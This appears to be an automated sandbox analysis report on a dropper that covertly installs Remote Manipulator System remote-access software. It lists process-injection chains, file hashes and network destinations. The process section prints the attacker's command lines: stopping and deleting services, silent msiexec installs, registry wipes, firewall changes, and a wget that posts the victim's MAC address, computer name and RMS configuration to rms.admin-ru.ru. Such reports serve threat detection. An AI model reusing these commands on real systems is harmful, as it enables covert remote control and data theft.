Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2636 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6.exe C:\Windows\SysWOW64\cmd.exe
PID 2636 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6.exe C:\Windows\SysWOW64\cmd.exe
PID 2636 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6.exe C:\Windows\SysWOW64\cmd.exe
PID 428 wrote to memory of 1480 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 428 wrote to memory of 1480 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 428 wrote to memory of 1480 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 1480 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 1480 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 1480 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 1940 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 1940 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 1940 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 1220 wrote to memory of 2680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1220 wrote to memory of 2680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1220 wrote to memory of 2680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1220 wrote to memory of 2196 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1220 wrote to memory of 2196 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1220 wrote to memory of 2196 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1220 wrote to memory of 784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1220 wrote to memory of 784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1220 wrote to memory of 784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1220 wrote to memory of 2600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1220 wrote to memory of 2600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1220 wrote to memory of 2600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1220 wrote to memory of 3748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1220 wrote to memory of 3748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1220 wrote to memory of 3748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1220 wrote to memory of 3976 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1220 wrote to memory of 3976 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1220 wrote to memory of 3976 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 3976 wrote to memory of 756 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3976 wrote to memory of 756 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3976 wrote to memory of 756 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1220 wrote to memory of 2740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1220 wrote to memory of 2740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1220 wrote to memory of 2740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1220 wrote to memory of 2676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1220 wrote to memory of 2676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1220 wrote to memory of 2676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1220 wrote to memory of 2296 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1220 wrote to memory of 2296 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1220 wrote to memory of 2296 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1220 wrote to memory of 3112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1220 wrote to memory of 3112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1220 wrote to memory of 3112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1220 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1220 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1220 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1220 wrote to memory of 1336 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1220 wrote to memory of 1336 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1220 wrote to memory of 1336 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1220 wrote to memory of 2520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1220 wrote to memory of 2520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1220 wrote to memory of 2520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1220 wrote to memory of 604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1220 wrote to memory of 604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1220 wrote to memory of 604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1220 wrote to memory of 1292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1220 wrote to memory of 1292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1220 wrote to memory of 1292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1220 wrote to memory of 2320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1220 wrote to memory of 2320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1220 wrote to memory of 2320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1220 wrote to memory of 1768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6.exe

"C:\Users\Admin\AppData\Local\Temp\a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123.cmd" "

C:\Users\Admin\AppData\Local\Temp\set.exe

set.exe -p1234567890__

C:\Users\Admin\AppData\Local\Temp\setting.exe

"C:\Users\Admin\AppData\Local\Temp\setting.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.cmd" "

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Windows\system32\sysfiles"

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Windows\syswow64\sysfiles"

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Program Files (x86)\Remote Manipulator System - Server"

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Program Files (x86)\Remote Manipulator System - Server"

C:\Windows\SysWOW64\net.exe

net stop rmanservice

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop rmanservice

C:\Windows\SysWOW64\sc.exe

sc delete "rmanservice"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rfusclient.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rfusclient.exe

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rfusclient.exe *32"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rfusclient.exe *32

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rutserv.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rutserv.exe

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rutserv.exe *32"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rutserv.exe *32

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {A5DB67DC-DB0E-4491-B9F7-F258A02EE03C} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {5B1EC627-A9CA-4BE8-966E-5FCB90ECD770} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {54D1AB84-6B0B-445D-B7AB-E2B2FEEC3A4F} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {FE83B905-4554-4DFF-97F4-9292178CB171} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {AB7AA605-500F-4153-8207-FB5563419112} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{11A90858-40BB-4858-A2DA-CA6495B5E907}" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\85809A11BB0485842AADAC46595B9E70\InstallProperties" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKCR\Installer\Products\85809A11BB0485842AADAC465 95B9E70" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SYSTEM\Remote Manipulator System" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AB7AA605-500F-4153-8207-FB5563419112}" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKCR\Installer\Products\506AA7BAF00535142870BF5536141921" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6EDC4423414699340B5D245426472701" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E45BAE6295648E74689FC47BF4E730EB" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E5052F47A02BDEA469F8EAB572D83BA8" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\System\CurrentControlSet\Services\RManService" /f

C:\Windows\SysWOW64\PING.EXE

ping -n 1 -w 500 google.com.ua

C:\Windows\SysWOW64\msiexec.exe

MsiExec /I "rms5.2.1.msi" /qn

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 784E58FAB6D675CB6D9196658DB211F4

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

"C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /silentinstall

C:\Windows\SysWOW64\sysfiles\rutserv.exe

"C:\Windows\SysWOW64\sysfiles\rutserv.exe" /silentinstall

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

"C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /firewall

C:\Windows\SysWOW64\sysfiles\rutserv.exe

"C:\Windows\SysWOW64\sysfiles\rutserv.exe" /firewall

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

"C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /start

C:\Windows\SysWOW64\sysfiles\rutserv.exe

"C:\Windows\SysWOW64\sysfiles\rutserv.exe" /start

C:\Windows\SysWOW64\sysfiles\rutserv.exe

C:\Windows\SysWOW64\sysfiles\rutserv.exe

C:\Windows\SysWOW64\PING.EXE

ping -n 10 127.0.0.1

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe /tray

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe /tray

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Reg Query "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters"|Find /I "Options"

C:\Windows\SysWOW64\reg.exe

Reg Query "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters"

C:\Windows\SysWOW64\find.exe

Find /I "Options"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c getmac|Find /I "Tcpip"

C:\Windows\SysWOW64\getmac.exe

getmac

C:\Windows\SysWOW64\find.exe

Find /I "Tcpip"

C:\Users\Admin\AppData\Local\Temp\wget.exe

wget --post-data="mac=DE-07-02-94-B4-D8&comp=EZNBLWLT&id=545046301154524F4D5365727665724F7074696F6E7300095573654E5441757468080D53656375726974794C6576656C020304506F727403121614456E61626C654F7665726C617943617074757265080C53686F775472617949636F6E080642696E644950060D416E7920696E746572666163651343616C6C6261636B4175746F436F6E6E656374091743616C6C6261636B436F6E6E656374496E74657276616C023C084869646553746F70090C497046696C7465725479706502021750726F7465637443616C6C6261636B53657474696E6773081550726F74656374496E6574496453657474696E6773080F446F4E6F7443617074757265524450080755736549507636091141736B557365725065726D697373696F6E0816557365725065726D697373696F6E496E74657276616C031027134175746F416C6C6F775065726D697373696F6E08134E656564417574686F72697479536572766572081F41736B5065726D697373696F6E4F6E6C794966557365724C6F676765644F6E080A496E7465726E657449640614532D46334232384636442D464338462D3443324411557365496E6574436F6E6E656374696F6E0913557365437573746F6D496E6574536572766572080A496E65744964506F72740317160D557365496E6574496449507636081444697361626C6552656D6F7465436F6E74726F6C081344697361626C6552656D6F746553637265656E081344697361626C6546696C655472616E73666572080F44697361626C655265646972656374080D44697361626C6554656C6E6574081444697361626C6552656D6F746545786563757465081244697361626C655461736B4D616E61676572080E44697361626C654F7665726C6179080F44697361626C6553687574646F776E081444697361626C6552656D6F746555706772616465081544697361626C655072657669657743617074757265081444697361626C654465766963654D616E61676572080B44697361626C6543686174081344697361626C6553637265656E5265636F7264081044697361626C65415643617074757265081244697361626C6553656E644D657373616765080F44697361626C655265676973747279080D44697361626C65415643686174081544697361626C6552656D6F746553657474696E677308144E6F746966794368616E67655472617949636F6E08104E6F7469667942616C6C6F6E48696E74080F4E6F74696679506C6179536F756E6408064C6F6755736508055369644964061034313735392E36383938343339353833084C6963656E73657306C2524D532D5A2D36414233383733313239626646373830303843323145666633453845434564616269593253326459586C52664477776E4932315756305A65586C39515643467866456457447778655241395749436732625674645555464457464E75596A39474267315A56673445416D5A2B61674145486C6C57446731554A6E4E6942785542424238434151466D456D49424167414243415548444830704A777745556C354744674141626D4977584577504442316256456B4E4A4431555677383D0D50726F787953657474696E67731426010000EFBBBF3C3F786D6C2076657273696F6E3D22312E302220656E636F64696E673D225554462D3136223F3E0D0A3C70726F78795F73657474696E67732076657273696F6E3D223532313030223E3C7573655F70726F78793E66616C73653C2F7573655F70726F78793E3C70726F78795F747970653E303C2F70726F78795F747970653E3C686F73743E3C2F686F73743E3C706F72743E383038303C2F706F72743E3C6E6565645F617574683E66616C73653C2F6E6565645F617574683E3C6E746D6C5F617574683E66616C73653C2F6E746D6C5F617574683E3C757365726E616D653E3C2F757365726E616D653E3C70617373776F72643E3C2F70617373776F72643E3C646F6D61696E3E3C2F646F6D61696E3E3C2F70726F78795F73657474696E67733E0D0A1144697361626C65496E7465726E65744964080000&group=download" http://rms.admin-ru.ru/updater.php -q -O -

C:\Windows\SysWOW64\PING.EXE

ping -n 3 127.0.0.1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "

Network

Country Destination Domain Proto
US 8.8.8.8:53 google.com.ua udp
US 8.8.8.8:53 rmansys.ru udp
RU 31.31.198.18:80 rmansys.ru tcp
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 31.31.198.18:80 rmansys.ru tcp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp
US 8.8.8.8:53 rms.admin-ru.ru udp
US 8.8.8.8:53 oneocsp.microsoft.com udp
US 204.79.197.203:80 oneocsp.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\123.cmd

MD5 dada62ed88a4fb1239573b99fece59b2
SHA1 39880571a27c2688559a81fdb4121339a83b3762
SHA256 43a93ceb9df8b17b5980b8e9c499ae1fccf248a06ee817f1987835f5d91f5fb8
SHA512 fc51a3a00603620ca06430d21d188eb2608ab83fb26bf69822839fdb8eecf36e65dc8a4b0f57a811e9cfa0460a22ebed2a3362e0b65afd585fc299f1629a303f

C:\Users\Admin\AppData\Local\Temp\set.exe

MD5 62de8fab8e2091cbd5a8897029b2c7ea
SHA1 e06430d20351d237b1ac355bebaeb74349b4d0c1
SHA256 7221193595cdda66f1900993d967dd0445ef8231c203ce0cd3771059d9582f21
SHA512 b12da04da431aba7b577ab84e4b4a4436b31e9ba88c21f6982ac5ff26252c22208e538cf3db884338866702413b1aaa2716bcf5e230f63da40cad44b3f6495a7

C:\Users\Admin\AppData\Local\Temp\set.exe

MD5 62de8fab8e2091cbd5a8897029b2c7ea
SHA1 e06430d20351d237b1ac355bebaeb74349b4d0c1
SHA256 7221193595cdda66f1900993d967dd0445ef8231c203ce0cd3771059d9582f21
SHA512 b12da04da431aba7b577ab84e4b4a4436b31e9ba88c21f6982ac5ff26252c22208e538cf3db884338866702413b1aaa2716bcf5e230f63da40cad44b3f6495a7

C:\Users\Admin\AppData\Local\Temp\setting.exe

MD5 8ff0fa4e0c195ca554b3ca7ec0694d3b
SHA1 cfd05fa4d401c3f1d314f48b6d10dc19bc07a475
SHA256 51b0346c5454a50189ab1e23ba7ca381f7acf5834365d6b244e80957cd70da3f
SHA512 2b98ec38c18f1f9d767349792c2f0e7e7316d9206ee43b5b8ef0d452709c190518998af5a45187caeb4c00962e75c4f4de338c731e8a7696f6ed06c9565bc484

C:\Users\Admin\AppData\Local\Temp\setting.exe

MD5 8ff0fa4e0c195ca554b3ca7ec0694d3b
SHA1 cfd05fa4d401c3f1d314f48b6d10dc19bc07a475
SHA256 51b0346c5454a50189ab1e23ba7ca381f7acf5834365d6b244e80957cd70da3f
SHA512 2b98ec38c18f1f9d767349792c2f0e7e7316d9206ee43b5b8ef0d452709c190518998af5a45187caeb4c00962e75c4f4de338c731e8a7696f6ed06c9565bc484

C:\Users\Admin\AppData\Local\Temp\install.cmd

MD5 d43e1bbae9332de223d13840fcd21a76
SHA1 1eb9cc47186ba225988382f2e38bbb75dc138128
SHA256 5f8293eda9fb40684caddf576eba6c81f3a06911ca9e4ecf84ede3b2891cff5e
SHA512 3da28389b074181d4a0f68f03bb1ee4b4e3ab6de6401b3c868d4dbd9edbb8abc861e54f07896a2d94324a6c12f9bd6faec9489533e32617b1ee8f89884c2a400

C:\Users\Admin\AppData\Local\Temp\rms5.2.1.msi

MD5 2abaf6748b3b3a8aad84f715ae3bd3c1
SHA1 c03d62077019f114c317e6e78b5c3b0e8893cd0e
SHA256 c6e22f166038f6f2d131ade1861ace4fd83f0ce9dc46f5b5f0332ef918ef0164
SHA512 b4f563c9e5d2aac42fb088851c1e00de4cbf8c9506e2d09f86eaedb9cd103ad19a0ed50e3e4c1dee892eb25a37f5b2221c8c609ddd83d2fb3f51c5891cfdeec2

C:\Windows\Installer\MSIAC54.tmp

MD5 b0bcc622f1fff0eec99e487fa1a4ddd9
SHA1 49aa392454bd5869fa23794196aedc38e8eea6f5
SHA256 b32687eaaad888410718875dcbff9f6a552e29c4d76af33e06e59859e1054081
SHA512 1572c1d07df2e9262d05a915d69ec4ebeb92eab50b89ce27dd290fb5a8e1de2c97d9320a3bb006834c98b3f6afcd7d2c29f039d9ca9afaa09c714406dedbc3c7

\Windows\Installer\MSIAC54.tmp

MD5 b0bcc622f1fff0eec99e487fa1a4ddd9
SHA1 49aa392454bd5869fa23794196aedc38e8eea6f5
SHA256 b32687eaaad888410718875dcbff9f6a552e29c4d76af33e06e59859e1054081
SHA512 1572c1d07df2e9262d05a915d69ec4ebeb92eab50b89ce27dd290fb5a8e1de2c97d9320a3bb006834c98b3f6afcd7d2c29f039d9ca9afaa09c714406dedbc3c7

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

C:\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

C:\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

memory/2756-404-0x0000000000870000-0x000000000091E000-memory.dmp

C:\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

C:\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
